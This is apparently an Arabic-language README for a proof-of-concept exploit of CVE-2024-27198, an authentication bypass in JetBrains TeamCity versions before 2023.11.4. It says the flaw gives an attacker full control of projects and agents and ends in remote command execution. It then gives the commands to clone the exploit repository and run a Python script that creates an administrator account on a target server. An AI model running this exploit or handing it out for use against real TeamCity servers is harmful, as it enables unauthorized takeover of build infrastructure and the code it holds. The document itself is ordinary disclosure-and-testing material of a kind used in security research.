
إثبات المفهوم حول CVE-2024-27198
في JetBrains TeamCity قبل الإصدار 2023.11.4، يوجد تجاوز للمصادقة يسمح بتنفيذ إجراءات إدارية في خادم TeamCity، يمكن للمهاجم السيطرة الكاملة على جميع مشاريع TeamCity والبنيات والعوامل والملفات، وأخيراً سينفذ المهاجم تنفيذ أوامر عن بُعد (RCE).
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
لإنشاء حساب بصلاحيات مدير داخل الخادم
python3 cve-2024-27198.py http://example.com username password

